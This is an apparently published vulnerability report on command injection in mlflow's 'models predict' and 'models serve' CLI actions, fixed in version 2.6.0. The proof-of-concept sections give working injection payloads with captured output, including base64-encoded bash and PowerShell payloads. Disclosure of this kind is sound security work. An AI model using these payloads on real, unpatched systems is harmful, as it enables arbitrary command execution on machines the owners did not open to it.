Multiple command injections in `mlflow models` CLI action in mlflow/mlflow

Valid

Reported on

Apr 30th 2023


Description

The mlflow cli executable is vulnerable to a command injection attack in mlflow models predict and mlflow models serve actions. The aforementioned actions is defined in file mlflow\models\cli.py, and uses a vulnerable predict and serve methods of a dynamically resolved instance of PyFuncBackend class, from a mlflow\pyfunc\backend.py file.

[Bug 1] mlflow models predict command injection

The code of the PyFuncBackend.predict method can be seen below:

def predict(self, model_uri, input_path, output_path, content_type):
    """
    Generate predictions using generic python model saved with MLflow. The expected format of
    the input JSON is the Mlflow scoring format.
    Return the prediction results as a JSON.
    """
    local_path = _download_artifact_from_uri(model_uri)
    # NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
    # platform compatibility.
    local_uri = path_to_local_file_uri(local_path)

    if self._env_manager != _EnvManager.LOCAL:
        command = (
            'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
            "model_uri={model_uri}, "
            "input_path={input_path}, "
            "output_path={output_path}, "
            "content_type={content_type})"
            '"'
        ).format(
            model_uri=repr(local_uri),
            input_path=repr(input_path),
            output_path=repr(output_path),
            content_type=repr(content_type),
        )
        return self.prepare_env(local_path).execute(command)
    else:
        scoring_server._predict(local_uri, input_path, output_path, content_type)

The application dynamically constructs a CMD command by injecting the user input into the predefined placeholders, and passes it to the the mlflow.utils.Environment.execute method, which essentially runs the newly created console command.

The application uses built-in python function repr to add quotes around the user input. Nonetheless, repr will not prevent the attacker from injecting a double quote into the CLI parameters to escape from the python -c "" parameter, as can be seen from the below example:

>>> local_uri='LOCAL_URI'
>>> input_path='INPUT_PATH'
>>> output_path='OUTPUT_PATH'
>>> content_type='injection poc"; we are free now; echo "escape the rest'
>>> command = (
...     'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
...     "model_uri={model_uri}, "
...     "input_path={input_path}, "
...     "output_path={output_path}, "
...     "content_type={content_type})"
...     '"'
... ).format(
...     model_uri=repr(local_uri),
...     input_path=repr(input_path),
...     output_path=repr(output_path),
...     content_type=repr(content_type),
... )
>>> print(command)
python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='LOCAL_URI', input_path='INPUT_PATH', output_path='OUTPUT_PATH', content_type='injection poc"; we are free now; echo "escape the rest')"

Thus, it is possible to inject arbitrary commands into the parameters of the mlflow models predict function to obtain an unintended code execution.

[Bug 2] mlflow models serve command injection

The code of vulnerable PyFuncBackend.serve method can be seen below.

def serve(
        self,
        model_uri,
        port,
        host,
        timeout,
        enable_mlserver,
        synchronous=True,
        stdout=None,
        stderr=None,
    ):  # pylint: disable=W0221
        """
        Serve pyfunc model locally.
        """
        local_path = _download_artifact_from_uri(model_uri)

        server_implementation = mlserver if enable_mlserver else scoring_server
        command, command_env = server_implementation.get_cmd(
            local_path, port, host, timeout, self._nworkers
        )

        ...
        if self._env_manager != _EnvManager.LOCAL:
            return self.prepare_env(local_path).execute(
                command,
                command_env,
                stdout=stdout,
                stderr=stderr,
                preexec_fn=setup_sigterm_on_parent_death,
                synchronous=synchronous,
            )
        else:
            _logger.info("=== Running command '%s'", command)

            if os.name != "nt":
                command = ["bash", "-c", command]

            child_proc = subprocess.Popen(
                command,
                env=command_env,
                preexec_fn=setup_sigterm_on_parent_death,
                stdout=stdout,
                stderr=stderr,
            )
            ...

The above uses get_cmd function, defined in mlflow/pyfunc/scoring_server/__init__.py that directly formats user input into a command string:

def get_cmd(
    model_uri: str, port: int = None, host: int = None, timeout: int = None, nworkers: int = None
) -> Tuple[str, Dict[str, str]]:
    local_uri = path_to_local_file_uri(model_uri)
    timeout = timeout or MLFLOW_SCORING_SERVER_REQUEST_TIMEOUT.get()
    # NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
    # platform compatibility.
    if os.name != "nt":
        args = [f"--timeout={timeout}"]
        if port and host:
            args.append(f"-b {host}:{port}")
        elif host:
            args.append(f"-b {host}")

        if nworkers:
            args.append(f"-w {nworkers}")

        command = (
            f"gunicorn {' '.join(args)} ${{GUNICORN_CMD_ARGS}}"
            " -- mlflow.pyfunc.scoring_server.wsgi:app"
        )
    else:
        args = []
        if host:
            args.append(f"--host={host}")

        if port:
            args.append(f"--port={port}")

        command = (
            f"waitress-serve {' '.join(args)} "
            "--ident=mlflow mlflow.pyfunc.scoring_server.wsgi:app"
        )

    command_env = os.environ.copy()
    command_env[_SERVER_MODEL_PATH] = local_uri

    return command, command_env

Proof of Concept

Install required dependencies

Install the latest version of mlflow

pip install mlflow

Install pyenv or conda (prerequisites to get mlflow models predict command to work with non local environments.

Pyenv installation guide

OR

Conda installation guide

Setup mlflow environment

Clone the mlflow repository into a local directory

git clone https://github.com/mlflow/mlflow

Run one of the example mlflow scripts that save a model, e.g. examples/sklearn_logistic_regression/train.py to populate the mlruns directory:

cd mlflow/examples/sklearn_logistic_regression
python train.py

List files inside mlruns/0/ directory to get a valid run ID

ls -l mlruns/0/

total 8
drwxrwxr-x 6 ubuntu ubuntu 4096 Apr 29 19:28 330068e1dfcf43cb8f1cd0e86038d781 # use this id
-rw-rw-r-- 1 ubuntu ubuntu  227 Apr 29 19:28 meta.yaml

[Bug 1] Exploitation

Insert the below payload into input path (-i), output path (-o), or type (-t) parameters:

"; YOUR COMMAND HERE; echo "

For example:

mlflow models predict -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -i 'test"; id; echo "' -o test
2023/04/29 19:48:00 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; id; echo "\', output_path=\'test\', content_type=\'json\')"']'
  File "<string>", line 1
    from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
                                                                                                                                                                                                                                   ^
SyntaxError: unterminated string literal (detected at line 1)
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')

If you want to perform some advanced commands that require use of any quotes, you may want to encode your input beforehand.

Injecting advanced payloads for Linux & virtualenv env manager:

# example of encoding a payload to echo "hello from mlflow rce" & run the "id" --env-manager virtualenv
echo 'echo "hello from mlflow rce!"; id;' | base64 

# encoded payload
ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo=

# poc
$ mlflow models predict -m 'runs:/RUN_ID/model/' -i 'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "' -o test
2023/04/29 20:09:37 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "\', output_path=\'test\', content_type=\'json\')"']'
  File "<string>", line 1
    from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
                                                                                                                                                                                                                                   ^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce!
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')

Injecting advanced payloads for for Windows & conda env manager:

# example of encoding a payload to echo "hello from mlflow rce" & run the "whoami /all"
https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')&input=ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlIjsgd2hvYW1pIC9hbGw

# encoded payload 
ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA==

# poc
(base) C:\Temp\mlflow\examples\sklearn_logistic_regression>mlflow models predict --env-manager conda -m mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model -i "test"" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo "" " -o test -t json
C:\Users\Strawberry\miniconda3\lib\site-packages\click\core.py:2322: UserWarning: Use of conda is discouraged. If you use it, please ensure that your use of conda complies with Anaconda's terms of service (https://legal.anaconda.com/policies/en/?name=terms-of-service). virtualenv is the recommended tool for environment reproducibility. To suppress this warning, set the MLFLOW_DISABLE_ENV_MANAGER_CONDA_WARNING (default: False, type: bool) environment variable to 'TRUE'.
  value = self.callback(ctx, self, value)
2023/04/30 02:32:40 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 02:32:43 INFO mlflow.utils.conda: Conda environment mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e already exists.
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c ""']'
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model\', input_path=\'test" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo " \', output_path=\'test\', content_type=\'json\')"']'
  File "<string>", line 1
    "from
    ^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce

USER INFORMATION
----------------

User Name                  SID
========================== =============================================
desktop-0gd1eqg\strawberry S-1-5-21-2872549777-3506415077-326829181-1001

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID                                           Attributes
============================================================= ================ ============================================= ==================================================
Everyone                                                      Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114                                     Group used for deny only
DESKTOP-0GD1EQG\docker-users                                  Alias            S-1-5-21-2872549777-3506415077-326829181-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544                                  Group used for deny only
BUILTIN\Hyper-V Administrators                                Alias            S-1-5-32-578                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users                                 Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

\" ', output_path='test', content_type='json')\"

[Bug 2] Exploitation

Insert the command injection payload into the -h (--host) parameter:

mlflow models serve -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -p '80' -h 'localhost & id & localhost'

2023/04/30 11:51:07 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && exec gunicorn --timeout=60 -b localhost & id & localhost:80 -w 1 ${GUNICORN_CMD_ARGS} -- mlflow.pyfunc.scoring_server.wsgi:app']'
...
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
...

Impact

An attacker is able to execute arbitrary OS commands by injecting malicious input into the CLI arguments of the models predict action of a mlflow executable. This vulnerability can be leveraged to get a foothold on a vulnerable machine, or attempt a local privilege escalation if a limited way of executing mlflow executable is obtained.

Occurrences

Code of the vulnerable PyFuncBackend.serve method

The code of a vulnerable PyFuncBackend.predict method

We are processing your report and will contact the mlflow team within 24 hours. 5 months ago
Maksym Vatsyk
5 months ago

Researcher


Upon further investigation, it seems that numerous methods of PyFuncBackend, and RFuncBackend classes are vulnerable to similar command injections. I will try to write them up asap & group them up in the report here

Maksym Vatsyk modified the report
5 months ago
Maksym Vatsyk
5 months ago

Researcher


Updated the description to include the second discovered command injection in PyFuncBackend. RFuncBackend is still in progress

We have contacted a member of the mlflow team and are waiting to hear back 5 months ago
Maksym Vatsyk
4 months ago

Researcher


Was unable to verify the RFuncBackend injections.

Serena Ruan validated this vulnerability 2 months ago
Maksym Vatsyk has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Maksym Vatsyk
2 months ago

Researcher


@admin, can we add a co-author to this report? https://huntr.dev/users/nashkersk/

Maksym Vatsyk
2 months ago

Researcher


Also, this vulnerability was fixed in https://github.com/mlflow/mlflow/pull/9053 by @serena-ruan

Serena Ruan marked this as fixed in 2.6.0 with commit 6dde93 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Aug 1st 2023
backend.py#L162 has been validated
backend.py#L133 has been validated
Serena Ruan published this vulnerability 2 months ago
to join this conversation